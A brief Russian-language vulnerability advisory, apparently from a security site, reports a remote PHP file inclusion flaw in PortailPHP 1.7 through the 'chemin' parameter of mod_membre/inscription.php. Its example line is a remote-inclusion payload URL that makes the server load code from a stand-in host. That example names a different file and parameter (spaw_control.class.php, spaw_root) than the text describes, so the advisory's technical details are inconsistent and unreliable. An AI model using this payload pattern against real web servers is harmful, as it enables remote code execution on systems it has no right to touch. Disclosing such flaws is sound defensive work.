• Партнер

  • Программа: PortailPHP 1.7, возможно другие версии.

    Уязвимость позволяет удаленному
    пользователю выполнить произвольный PHP
    сценарий на целевой системе. Уязвимость
    существует из-за недостаточной обработки
    входных данных в параметре "chemin" в
    сценарии mod_membre/inscription.php. Удаленный
    пользователь может выполнить произвольный
    PHP сценарий на целевой системе с
    привилегиями Web сервера. Для удачной
    эксплуатации уязвимости опция "register_globals"
    должна быть включена в конфигурационном
    файле PHP.

    Пример:

    http://example/[ac_path]/spaw/spaw_control.class.php?spaw_root=[cmd_url]/

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии